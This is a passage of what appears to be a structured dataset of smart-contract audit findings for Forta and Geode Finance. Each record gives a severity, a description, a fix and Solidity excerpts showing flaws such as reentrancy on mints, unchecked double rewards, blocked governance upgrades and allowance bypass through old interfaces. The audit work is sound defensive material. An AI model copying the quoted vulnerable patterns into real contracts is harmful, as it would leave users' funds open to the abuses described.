Then, it will be a game of luck, whoever creates that agent first will get the ID minted to its address, and the other user's transaction will be reverted wasting the time they have spent on the delay.\\nAs the `agentIDs` can be picked by users, the chances of collisions with an already minted ID will increase over time causing unnecessary reverts for others.\\nAdding to the fact that there is no restriction for owner address, anyone can spam mint any `agentID` to any address for any profitable reason.\\n```\\nfunction createAgent(uint256 agentId, address owner, string calldata metadata, uint256[] calldata chainIds)\\npublic\\n onlySorted(chainIds)\\n frontrunProtected(keccak256(abi.encodePacked(agentId, owner, metadata, chainIds)), frontRunningDelay)\\n{\\n \\_mint(owner, agentId);\\n \\_beforeAgentUpdate(agentId, metadata, chainIds);\\n \\_agentUpdate(agentId, metadata, chainIds);\\n \\_afterAgentUpdate(agentId, metadata, chainIds);\\n}\\n```\\nчModify function `prepareAgent` to not commit an already registered `agentID`.\\nA better approach could be to allow sequential minting of `agentIDs` using some counters.\\nOnly allow users to mint an `agentID`, either for themselves or for someone they are approved to.чч```\\nfunction createAgent(uint256 agentId, address owner, string calldata metadata, uint256[] calldata chainIds)\\npublic\\n onlySorted(chainIds)\\n frontrunProtected(keccak256(abi.encodePacked(agentId, owner, metadata, chainIds)), frontRunningDelay)\\n{\\n \\_mint(owner, agentId);\\n \\_beforeAgentUpdate(agentId, metadata, chainIds);\\n \\_agentUpdate(agentId, metadata, chainIds);\\n \\_afterAgentUpdate(agentId, metadata, chainIds);\\n}\\n```\\n -Lack of checks for rewarding an epoch that has already been rewardedчmediumчTo give rewards to the participating stakers, the Forta system utilizes reward epochs for each `shareId`, i.e. a delegated staking share. 
Each epoch gets its own reward distribution, and then `StakeAllocator` and `RewardsDistributor` contracts along with the Forta staking shares determine how much the users get.\nTo actually allocate these rewards, a privileged account with the role `REWARDER_ROLE` calls the `RewardsDistributor.reward()` function with appropriate parameters to store the `amount` a `shareId` gets for that specific `epochNumber`, and then adds the `amount` to the `totalRewardsDistributed` contract variable for tracking. However, there is no check that the `shareId` already received rewards for that `epoch`. The new reward `amount` simply replaces the old reward `amount`, and `totalRewardsDistributed` gets the new `amount` added to it anyway. This causes inconsistencies with accounting in the `totalRewardsDistributed` variable.\nAlthough `totalRewardsDistributed` is essentially isolated to the `sweep()` function to allow transferring out the reward tokens without taking away those tokens reserved for the reward distribution, this still creates an inconsistency, albeit a minor one in the context of the current system.\nSimilarly, the `sweep()` function deducts the `totalRewardsDistributed` amount instead of the amount of pending rewards only. In other words, either there should be a different variable that tracks only pending rewards, or the `totalRewardsDistributed` should have token amounts deducted from it when users execute the `claimRewards()` function. 
Otherwise, after a few epochs there will be a really large `totalRewardsDistributed` amount that might not reflect the real amount of pending reward tokens left on the contract, and the `sweep()` function for the reward token is likely to fail for any amount being transferred out.\\n```\\nfunction reward(\\n uint8 subjectType,\\n uint256 subjectId,\\n uint256 amount,\\n uint256 epochNumber\\n) external onlyRole(REWARDER\\_ROLE) {\\n if (subjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(subjectType);\\n if (!\\_subjectGateway.isRegistered(subjectType, subjectId)) revert RewardingNonRegisteredSubject(subjectType, subjectId);\\n uint256 shareId = FortaStakingUtils.subjectToActive(getDelegatorSubjectType(subjectType), subjectId);\\n \\_rewardsPerEpoch[shareId][epochNumber] = amount;\\n totalRewardsDistributed += amount;\\n emit Rewarded(subjectType, subjectId, amount, epochNumber);\\n}\\n```\\nчImplement checks as appropriate to the `reward()` function to ensure correct behavior of `totalRewardsDistributed` tracking. Also, implement necessary changes to the tracking of pending rewards, if necessary.чч```\\nfunction reward(\\n uint8 subjectType,\\n uint256 subjectId,\\n uint256 amount,\\n uint256 epochNumber\\n) external onlyRole(REWARDER\\_ROLE) {\\n if (subjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(subjectType);\\n if (!\\_subjectGateway.isRegistered(subjectType, subjectId)) revert RewardingNonRegisteredSubject(subjectType, subjectId);\\n uint256 shareId = FortaStakingUtils.subjectToActive(getDelegatorSubjectType(subjectType), subjectId);\\n \\_rewardsPerEpoch[shareId][epochNumber] = amount;\\n totalRewardsDistributed += amount;\\n emit Rewarded(subjectType, subjectId, amount, epochNumber);\\n}\\n```\\n -Reentrancy in FortaStaking during ERC1155 mintsчmediumчIn the Forta staking system, the staking shares (both “active” and “inactive”) are represented as tokens implemented according to the `ERC1155` standard. 
The specific implementation that is being used utilizes a smart contract acceptance check `_doSafeTransferAcceptanceCheck()` upon mints to the recipient.\\n```\\ncontract FortaStaking is BaseComponentUpgradeable, ERC1155SupplyUpgradeable, SubjectTypeValidator, ISlashingExecutor, IStakeMigrator {\\n```\\n\\nThe specific implementation for `ERC1155SupplyUpgradeable` contracts can be found here, and the smart contract check can be found here.\\nThis opens up reentrancy into the system's flow. In fact, the reentrancy occurs on all mints that happen in the below functions, and it happens before a call to another Forta contract for allocation is made via either `_allocator.depositAllocation` or _allocator.withdrawAllocation:\\n```\\nfunction deposit(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 stakeValue\\n) external onlyValidSubjectType(subjectType) notAgencyType(subjectType, SubjectStakeAgency.MANAGED) returns (uint256) {\\n if (address(subjectGateway) == address(0)) revert ZeroAddress(\"subjectGateway\");\\n if (!subjectGateway.isStakeActivatedFor(subjectType, subject)) revert StakeInactiveOrSubjectNotFound();\\n address staker = \\_msgSender();\\n uint256 activeSharesId = FortaStakingUtils.subjectToActive(subjectType, subject);\\n bool reachedMax;\\n (stakeValue, reachedMax) = \\_getInboundStake(subjectType, subject, stakeValue);\\n if (reachedMax) {\\n emit MaxStakeReached(subjectType, subject);\\n }\\n uint256 sharesValue = stakeToActiveShares(activeSharesId, stakeValue);\\n SafeERC20.safeTransferFrom(stakedToken, staker, address(this), stakeValue);\\n\\n \\_activeStake.mint(activeSharesId, stakeValue);\\n \\_mint(staker, activeSharesId, sharesValue, new bytes(0));\\n emit StakeDeposited(subjectType, subject, staker, stakeValue);\\n \\_allocator.depositAllocation(activeSharesId, subjectType, subject, staker, stakeValue, sharesValue);\\n return sharesValue;\\n}\\n```\\n\\n```\\nfunction migrate(\\n uint8 oldSubjectType,\\n uint256 oldSubject,\\n uint8 
newSubjectType,\\n uint256 newSubject,\\n address staker\\n) external onlyRole(SCANNER\\_2\\_NODE\\_RUNNER\\_MIGRATOR\\_ROLE) {\\n if (oldSubjectType != SCANNER\\_SUBJECT) revert InvalidSubjectType(oldSubjectType);\\n if (newSubjectType != NODE\\_RUNNER\\_SUBJECT) revert InvalidSubjectType(newSubjectType); \\n if (isFrozen(oldSubjectType, oldSubject)) revert FrozenSubject();\\n\\n uint256 oldSharesId = FortaStakingUtils.subjectToActive(oldSubjectType, oldSubject);\\n uint256 oldShares = balanceOf(staker, oldSharesId);\\n uint256 stake = activeSharesToStake(oldSharesId, oldShares);\\n uint256 newSharesId = FortaStakingUtils.subjectToActive(newSubjectType, newSubject);\\n uint256 newShares = stakeToActiveShares(newSharesId, stake);\\n\\n \\_activeStake.burn(oldSharesId, stake);\\n \\_activeStake.mint(newSharesId, stake);\\n \\_burn(staker, oldSharesId, oldShares);\\n \\_mint(staker, newSharesId, newShares, new bytes(0));\\n emit StakeDeposited(newSubjectType, newSubject, staker, stake);\\n \\_allocator.depositAllocation(newSharesId, newSubjectType, newSubject, staker, stake, newShares);\\n}\\n```\\n\\n```\\nfunction initiateWithdrawal(\\n uint8 subjectType,\\n uint256 subject,\\n uint256 sharesValue\\n) external onlyValidSubjectType(subjectType) returns (uint64) {\\n address staker = \\_msgSender();\\n uint256 activeSharesId = FortaStakingUtils.subjectToActive(subjectType, subject);\\n if (balanceOf(staker, activeSharesId) == 0) revert NoActiveShares();\\n uint64 deadline = SafeCast.toUint64(block.timestamp) + \\_withdrawalDelay;\\n\\n \\_lockingDelay[activeSharesId][staker].setDeadline(deadline);\\n\\n uint256 activeShares = Math.min(sharesValue, balanceOf(staker, activeSharesId));\\n uint256 stakeValue = activeSharesToStake(activeSharesId, activeShares);\\n uint256 inactiveShares = stakeToInactiveShares(FortaStakingUtils.activeToInactive(activeSharesId), stakeValue);\\n SubjectStakeAgency agency = getSubjectTypeAgency(subjectType);\\n 
\\_activeStake.burn(activeSharesId, stakeValue);\\n \\_inactiveStake.mint(FortaStakingUtils.activeToInactive(activeSharesId), stakeValue);\\n \\_burn(staker, activeSharesId, activeShares);\\n \\_mint(staker, FortaStakingUtils.activeToInactive(activeSharesId), inactiveShares, new bytes(0));\\n if (agency == SubjectStakeAgency.DELEGATED || agency == SubjectStakeAgency.DELEGATOR) {\\n \\_allocator.withdrawAllocation(activeSharesId, subjectType, subject, staker, stakeValue, activeShares);\\n }\\n```\\n\\nAlthough this doesn't seem to be an issue in the current Forta system of contracts since the allocator's logic doesn't seem to be manipulable, this could still be dangerous as it opens up an external execution flow.чConsider introducing a reentrancy check or emphasize this behavior in the documentation, so that both other projects using this system later and future upgrades along with maintenance work on the Forta staking system itself are implemented safely.чч```\\ncontract FortaStaking is BaseComponentUpgradeable, ERC1155SupplyUpgradeable, SubjectTypeValidator, ISlashingExecutor, IStakeMigrator {\\n```\\n -Unnecessary code blocks that check the same conditionчlowчIn the `RewardsDistributor` there is a function that allows to set delegation fees for a `NodeRunner`. It adjusts the `fees[]` array for that node as appropriate. 
However, during its checks, it performs the same check twice in a row.\\n```\\nif (fees[1].sinceEpoch != 0) {\\n if (Accumulators.getCurrentEpochNumber() < fees[1].sinceEpoch + delegationParamsEpochDelay) revert SetDelegationFeeNotReady();\\n}\\nif (fees[1].sinceEpoch != 0) {\\n fees[0] = fees[1];\\n}\\n```\\nчConsider refactoring this under a single code block.чч```\\nif (fees[1].sinceEpoch != 0) {\\n if (Accumulators.getCurrentEpochNumber() < fees[1].sinceEpoch + delegationParamsEpochDelay) revert SetDelegationFeeNotReady();\\n}\\nif (fees[1].sinceEpoch != 0) {\\n fees[0] = fees[1];\\n}\\n```\\n -Event spam in RewardsDistributor.claimRewardsчlowчThe `RewardsDistributor` contract allows users to claim their rewards through the `claimRewards()` function. It does check to see whether or not the user has already claimed the rewards for a specific epoch that they are claiming for, but it does not check to see if the user has any associated rewards at all. This could lead to event `ClaimedRewards` being spammed by malicious users, especially on low gas chains.\\n```\\nfor (uint256 i = 0; i < epochNumbers.length; i++) {\\n if (\\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()]) revert AlreadyClaimed();\\n \\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()] = true;\\n uint256 epochRewards = \\_availableReward(shareId, isDelegator, epochNumbers[i], \\_msgSender());\\n SafeERC20.safeTransfer(rewardsToken, \\_msgSender(), epochRewards);\\n emit ClaimedRewards(subjectType, subjectId, \\_msgSender(), epochNumbers[i], epochRewards);\\n```\\nчAdd a check for rewards amounts being greater than 0.чч```\\nfor (uint256 i = 0; i < epochNumbers.length; i++) {\\n if (\\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()]) revert AlreadyClaimed();\\n \\_claimedRewardsPerEpoch[shareId][epochNumbers[i]][\\_msgSender()] = true;\\n uint256 epochRewards = \\_availableReward(shareId, isDelegator, epochNumbers[i], \\_msgSender());\\n 
SafeERC20.safeTransfer(rewardsToken, \\_msgSender(), epochRewards);\\n emit ClaimedRewards(subjectType, subjectId, \\_msgSender(), epochNumbers[i], epochRewards);\\n```\\n -Lack of a check for the subject's stake for reviewSlashProposalParametersчlowчIn the `SlashingController` contract, the address with the `SLASHING_ARBITER_ROLE` may call the `reviewSlashProposalParameters()` function to adjust the slashing proposal to a new `_subjectId` and `_subjectType`. However, unlike in the `proposeSlash()` function, there is no check for that subject having any stake at all.\\nWhile it may be assumed that the review function will be called by a privileged and knowledgeable actor, this additional check may avoid accidental mistakes.\\n```\\nif (subjectGateway.totalStakeFor(\\_subjectType, \\_subjectId) == 0) revert ZeroAmount(\"subject stake\");\\n```\\n\\n```\\nif (\\_subjectType != proposals[\\_proposalId].subjectType || \\_subjectId != proposals[\\_proposalId].subjectId) {\\n \\_unfreeze(\\_proposalId);\\n \\_freeze(\\_subjectType, \\_subjectId);\\n}\\n```\\nчAdd a check for the new subject having stake to slash.чч```\\nif (subjectGateway.totalStakeFor(\\_subjectType, \\_subjectId) == 0) revert ZeroAmount(\"subject stake\");\\n```\\n -Comment and code inconsistenciesчlowчDuring the audit a few inconsistencies were found between what the comments say and what the implemented code actually did.\\nSubject Type Agency for Scanner Subjects\\nIn the `SubjectTypeValidator`, the comment says that the `SCANNER_SUBJECT` is of type `DIRECT` agency type, i.e. it can be directly staked on by multiple different stakers. 
However, we found a difference in the implementation, where the concerned subject is defined as type `MANAGED` agency type, which says that it cannot be staked on directly; instead it's a delegated type and the allocation is supposed to be managed by its manager.\\n```\\n\\* - SCANNER\\_SUBJECT --> DIRECT\\n```\\n\\n```\\n} else if (subjectType == SCANNER\\_SUBJECT) {\\n return SubjectStakeAgency.MANAGED;\\n```\\n\\nDispatch refers to ERC721 tokens as ERC1155\\nOne of the comments describing the functionality to `link` and `unlink` agents and scanners refers to them as ERC1155 tokens, when in reality they are ERC721.\\n```\\n/\\*\\*\\n \\* @notice Assigns the job of running an agent to a scanner.\\n \\* @dev currently only allowed for DISPATCHER\\_ROLE (Assigner software).\\n \\* @dev emits Link(agentId, scannerId, true) event.\\n \\* @param agentId ERC1155 token id of the agent.\\n \\* @param scannerId ERC1155 token id of the scanner.\\n \\*/\\n```\\n\\nNodeRunnerRegistryCore comment that implies the reverse of what happens\\nA comment describing a helper function that returns address for a given scanner ID describes the opposite behavior. It is the same comment for the function just above that actually does what the comment says.\\n```\\n/// Converts scanner address to uint256 for FortaStaking Token Id.\\nfunction scannerIdToAddress(uint256 scannerId) public pure returns (address) {\\n return address(uint160(scannerId));\\n}\\n```\\n\\nScannerToNodeRunnerMigration comment that says that no NodeRunner tokens must be owned\\nFor the migration from Scanners to NodeRunners, a comment in the beginning of the file implies that for the system to work correctly, there must be no NodeRunner tokens owned prior to migration. 
After a conversation with the Forta Foundation team, it appears that this was an early design choice that is no longer relevant.\\n```\\n\\* @param nodeRunnerId If set as 0, a new NodeRunnerRegistry ERC721 will be minted to nodeRunner (but it must not own any prior),\\n```\\n\\n```\\n\\* @param nodeRunnerId If set as 0, a new NodeRunnerRegistry ERC721 will be minted to nodeRunner (but it must not own any prior),\\n```\\nчVerify the operational logic and fix either the concerned comments or defined logic as per the need.чч```\\n\\* - SCANNER\\_SUBJECT --> DIRECT\\n```\\n -Oracle's _sanityCheck for prices will not work with slashingчhighчThe `_sanityCheck` is verifying that the new price didn't change significantly:\\n```\\nuint256 maxPrice = curPrice +\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_INCREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nuint256 minPrice = curPrice -\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_DECREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nrequire(\\n \\_newPrice >= minPrice && \\_newPrice <= maxPrice,\\n \"OracleUtils: price is insane\"\\n```\\n\\nWhile the rewards of staking can be reasonably predicted, the balances may also be changed due to slashing. So any slashing event should reduce the price, and if enough ETH is slashed, the price will drop heavily. The oracle will not be updated because of a sanity check. After that, there will be an arbitrage opportunity, and everyone will be incentivized to withdraw as soon as possible. That process will inevitably devaluate gETH to zero. 
The severity of this issue is also amplified by the fact that operators have no skin in the game and won't lose anything from slashing.чMake sure that slashing can be adequately processed when updating the price.чч```\\nuint256 maxPrice = curPrice +\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_INCREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nuint256 minPrice = curPrice -\\n ((curPrice \\*\\n self.PERIOD\\_PRICE\\_DECREASE\\_LIMIT \\*\\n \\_periodsSinceUpdate) / PERCENTAGE\\_DENOMINATOR);\\n\\nrequire(\\n \\_newPrice >= minPrice && \\_newPrice <= maxPrice,\\n \"OracleUtils: price is insane\"\\n```\\n -MiniGovernance - fetchUpgradeProposal will always revertчhighчIn the function `fetchUpgradeProposal()`, `newProposal()` is called with a hard coded `duration` of 4 weeks. This means the function will always revert since `newProposal()` checks that the proposal `duration` is not more than the constant `MAX_PROPOSAL_DURATION` of 2 weeks. Effectively, this leaves MiniGovernance non-upgradeable.\\n```\\nGEM.newProposal(proposal.CONTROLLER, 2, proposal.NAME, 4 weeks);\\n```\\n\\n```\\nrequire(\\n duration <= MAX\\_PROPOSAL\\_DURATION,\\n \"GeodeUtils: duration exceeds MAX\\_PROPOSAL\\_DURATION\"\\n);\\n```\\nчSwitch the hard coded proposal duration to 2 weeks.чч```\\nGEM.newProposal(proposal.CONTROLLER, 2, proposal.NAME, 4 weeks);\\n```\\n -Updating interfaces of derivatives is done in a dangerous and unpredictable manner.чmediumчGeode Finance codebase provides planet maintainers with the ability to enable or disable different contracts to act as the main token contract. In fact, multiple separate contracts can be used at the same time if decided so by the planet maintainer. 
Those contracts will have shared balances but will not share the allowances as you can see below:\\n```\\nmapping(uint256 => mapping(address => uint256)) private \\_balances;\\n```\\n\\n```\\nmapping(address => mapping(address => uint256)) private \\_allowances;\\n```\\n\\nUnfortunately, this approach comes with some implications that are very hard to predict as they involve interactions with other systems, but is possible to say that the consequences of those implications will most always be negative. We will not be able to outline all the implications of this issue, but we can try and outline the pattern that they all would follow.\\nThere are really two ways to update an interface: set the new one and immediately unset the old one, or have them both run in parallel for some time. Let's look at them one by one.\\nin the first case, the old interface is disabled immediately. Given that interfaces share balances that will lead to some very serious consequences. Imagine the following sequence:\\nAlice deposits her derivatives into the DWP contract for liquidity mining.\\nPlanet maintainer updates the interface and immediately disables the old one.\\nDWP contract now has the old tokens and the new ones. But only the new ones are accounted for in the storage and thus can be withdrawn. Unfortunately, the old tokens are disabled meaning that now both old and new tokens are lost.\\nThis can happen in pretty much any contract and not just the DWP token. Unless the holders had enough time to withdraw the derivatives back to their wallets all the funds deposited into contracts could be lost.\\nThis leads us to the second case where the two interfaces are active in parallel. This would solve the issue above by allowing Alice to withdraw the old tokens from the DWP and make the new tokens follow. Unfortunately, there is an issue in that case as well.\\nSome DeFi contracts allow their owners to withdraw any tokens that are not accounted for by the internal accounting. 
DWP allows the withdrawal of admin fees if the contract has more tokens than `balances[]` store. Some contracts even allow to withdraw funds that were accidentally sent to the contract by people. Either to recover them or just as a part of dust collection. Let's call such contracts “dangerous contracts” for our purposes.\\nAlice deposits her derivatives into the dangerous contract.\\nPlanet maintainer sets a new interface.\\nOwner of the dangerous contract sees that some odd and unaccounted tokens landed in the contract. He learns those are real and are part of Geode ecosystem. So he takes them.\\nOld tokens will follow the new tokens. That means Alice now has no claim to them and the contract that they just left has broken accounting since numbers there are not backed by tokens anymore.\\nOne other issue we would like to highlight here is that despite the contracts being expected to have separate allowances, if the old contract has the allowance set, the initial 0 value of the new one will be ignored. Here is an example:\\nAlice approves Bob for 100 derivatives.\\nPlanet maintainer sets a new interface. The new interface has no allowance from Alice to Bob.\\nBob still can transfer new tokens from Alice to himself by transferring the old tokens for which he still has the allowance. New token balances will be updated accordingly.\\nAlice could also give Bob an allowance of 100 tokens in the new contract since that was her original intent, but this would mean that Bob now has 200 token allowance.\\nThis is extremely convoluted and will most likely result in errors made by the planet maintainers when updating the interfaces.чThe safest option is to only allow a list of whitelisted interfaces to be used that are well-documented and audited. 
Planet maintainers could then choose the once that they see fit.чч```\\nmapping(uint256 => mapping(address => uint256)) private \\_balances;\\n```\\n -Only the GOVERNANCE can initialize the PortalчmediumчIn the Portal's `initialize` function, the `_GOVERNANCE` is passed as a parameter:\\n```\\nfunction initialize(\\n address \\_GOVERNANCE,\\n address \\_gETH,\\n address \\_ORACLE\\_POSITION,\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n address \\_MINI\\_GOVERNANCE\\_POSITION,\\n uint256 \\_GOVERNANCE\\_TAX,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD\\n) public virtual override initializer {\\n \\_\\_ReentrancyGuard\\_init();\\n \\_\\_Pausable\\_init();\\n \\_\\_ERC1155Holder\\_init();\\n \\_\\_UUPSUpgradeable\\_init();\\n\\n GEODE.SENATE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.MAX\\_GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.SENATE\\_EXPIRY = type(uint256).max;\\n\\n STAKEPOOL.GOVERNANCE = \\_GOVERNANCE;\\n STAKEPOOL.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.ORACLE\\_POSITION = \\_ORACLE\\_POSITION;\\n STAKEPOOL.TELESCOPE.MONOPOLY\\_THRESHOLD = 20000;\\n\\n updateStakingParams(\\n \\_DEFAULT\\_gETH\\_INTERFACE,\\n \\_DEFAULT\\_DWP,\\n \\_DEFAULT\\_LP\\_TOKEN,\\n \\_MAX\\_MAINTAINER\\_FEE,\\n \\_BOOSTRAP\\_PERIOD,\\n type(uint256).max,\\n type(uint256).max,\\n \\_COMET\\_TAX,\\n 3 days\\n );\\n```\\n\\nBut then it calls the `updateStakingParams` function, which requires the `msg.sender` to be the governance:\\n```\\nfunction updateStakingParams(\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD,\\n uint256 \\_PERIOD\\_PRICE\\_INCREASE\\_LIMIT,\\n uint256 \\_PERIOD\\_PRICE\\_DECREASE\\_LIMIT,\\n 
uint256 \\_COMET\\_TAX,\\n uint256 \\_BOOST\\_SWITCH\\_LATENCY\\n) public virtual override {\\n require(\\n msg.sender == GEODE.GOVERNANCE,\\n \"Portal: sender not GOVERNANCE\"\\n );\\n```\\n\\nSo only the future governance can initialize the `Portal`. In the case of the Geode protocol, the governance will be represented by a token contract, making it hard to initialize promptly. Initialization should be done by an actor that is more flexible than governance.чSplit the `updateStakingParams` function into public and private ones and use them accordingly.чч```\\nfunction initialize(\\n address \\_GOVERNANCE,\\n address \\_gETH,\\n address \\_ORACLE\\_POSITION,\\n address \\_DEFAULT\\_gETH\\_INTERFACE,\\n address \\_DEFAULT\\_DWP,\\n address \\_DEFAULT\\_LP\\_TOKEN,\\n address \\_MINI\\_GOVERNANCE\\_POSITION,\\n uint256 \\_GOVERNANCE\\_TAX,\\n uint256 \\_COMET\\_TAX,\\n uint256 \\_MAX\\_MAINTAINER\\_FEE,\\n uint256 \\_BOOSTRAP\\_PERIOD\\n) public virtual override initializer {\\n \\_\\_ReentrancyGuard\\_init();\\n \\_\\_Pausable\\_init();\\n \\_\\_ERC1155Holder\\_init();\\n \\_\\_UUPSUpgradeable\\_init();\\n\\n GEODE.SENATE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE = \\_GOVERNANCE;\\n GEODE.GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.MAX\\_GOVERNANCE\\_TAX = \\_GOVERNANCE\\_TAX;\\n GEODE.SENATE\\_EXPIRY = type(uint256).max;\\n\\n STAKEPOOL.GOVERNANCE = \\_GOVERNANCE;\\n STAKEPOOL.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.gETH = IgETH(\\_gETH);\\n STAKEPOOL.TELESCOPE.ORACLE\\_POSITION = \\_ORACLE\\_POSITION;\\n STAKEPOOL.TELESCOPE.MONOPOLY\\_THRESHOLD = 20000;\\n\\n updateStakingParams(\\n \\_DEFAULT\\_gETH\\_INTERFACE,\\n \\_DEFAULT\\_DWP,\\n \\_DEFAULT\\_LP\\_TOKEN,\\n \\_MAX\\_MAINTAINER\\_FEE,\\n \\_BOOSTRAP\\_PERIOD,\\n type(uint256).max,\\n type(uint256).max,\\n \\_COMET\\_TAX,\\n 3 days\\n );\\n```\\n -The maintainer of the MiniGovernance can block the changeMaintainer functionчmediumчEvery entity with an ID has a controller and a maintainer. 
The controller tends to have more control, and the maintainer is mostly used for operational purposes. So the controller should be able to change the maintainer if that is required. Indeed we see that it is possible in the MiniGovernance too:\\n```\\nfunction changeMaintainer(\\n bytes calldata password,\\n bytes32 newPasswordHash,\\n address newMaintainer\\n)\\n external\\n virtual\\n override\\n onlyPortal\\n whenNotPaused\\n returns (bool success)\\n{\\n require(\\n SELF.PASSWORD\\_HASH == bytes32(0) ||\\n SELF.PASSWORD\\_HASH ==\\n keccak256(abi.encodePacked(SELF.ID, password))\\n );\\n SELF.PASSWORD\\_HASH = newPasswordHash;\\n\\n \\_refreshSenate(newMaintainer);\\n\\n success = true;\\n}\\n```\\n\\nHere the `changeMaintainer` function can only be called by the Portal, and only the controller can initiate that call. But the maintainer can pause the MiniGovernance, which will make this call revert because the `_refreshSenate` function has the `whenNotPaused` modifier. Thus maintainer could intentionally prevent the controller from replacing it by another maintainer.чMake sure that the controller can always change the malicious maintainer.чч```\\nfunction changeMaintainer(\\n bytes calldata password,\\n bytes32 newPasswordHash,\\n address newMaintainer\\n)\\n external\\n virtual\\n override\\n onlyPortal\\n whenNotPaused\\n returns (bool success)\\n{\\n require(\\n SELF.PASSWORD\\_HASH == bytes32(0) ||\\n SELF.PASSWORD\\_HASH ==\\n keccak256(abi.encodePacked(SELF.ID, password))\\n );\\n SELF.PASSWORD\\_HASH = newPasswordHash;\\n\\n \\_refreshSenate(newMaintainer);\\n\\n success = true;\\n}\\n```\\n -Entities are not required to be initiatedчmediumчEvery entity (Planet, Comet, Operator) has a 3-step creation process:\\nCreation of the proposal.\\nApproval of the proposal.\\nInitiation of the entity.\\nThe last step is crucial, but it is never explicitly checked that the entity is initialized. 
The initiation always includes the `initiator` modifier that works with the `\"initiated\"` slot on DATASTORE:\\n```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, \"CONTROLLER\"),\\n \"MaintainerUtils: sender NOT CONTROLLER\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"TYPE\") == \\_TYPE,\\n \"MaintainerUtils: id NOT correct TYPE\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"initiated\") == 0,\\n \"MaintainerUtils: already initiated\"\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, \"maintainer\", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, \"initiated\", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n\\nBut this slot is never actually checked when the entities are used. While we did not find any profitable attack vector using uninitiated entities, the code will be upgraded, which may allow for possible attack vectors related to this issue.чMake sure the entities are initiated before they are used.чч```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, \"CONTROLLER\"),\\n \"MaintainerUtils: sender NOT CONTROLLER\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"TYPE\") == \\_TYPE,\\n \"MaintainerUtils: id NOT correct TYPE\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"initiated\") == 0,\\n \"MaintainerUtils: already initiated\"\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, \"maintainer\", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, \"initiated\", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n -The blameOperator can be called for an alienated validatorчmediumчThe `blameOperator` function is designed to be called by anyone. 
If some operator did not signal to exit in time, anyone can blame and imprison this operator.\\n```\\n/\\*\\*\\n \\* @notice allows improsening an Operator if the validator have not been exited until expectedExit\\n \\* @dev anyone can call this function\\n \\* @dev if operator has given enough allowence, they can rotate the validators to avoid being prisoned\\n \\*/\\nfunction blameOperator(\\n StakePool storage self,\\n DataStoreUtils.DataStore storage DATASTORE,\\n bytes calldata pk\\n) external {\\n if (\\n block.timestamp > self.TELESCOPE.\\_validators[pk].expectedExit &&\\n self.TELESCOPE.\\_validators[pk].state != 3\\n ) {\\n OracleUtils.imprison(\\n DATASTORE,\\n self.TELESCOPE.\\_validators[pk].operatorId\\n );\\n }\\n}\\n```\\n\\nThe problem is that it can be called for any state that is not `3` (self.TELESCOPE._validators[pk].state != 3). But it should only be called for active validators whose state equals `2`. So the `blameOperator` can be called an infinite amount of time for alienated or not approved validators. These types of validators cannot switch to state `3`.\\nThe severity of the issue is mitigated by the fact that this function is currently unavailable for users to call. 
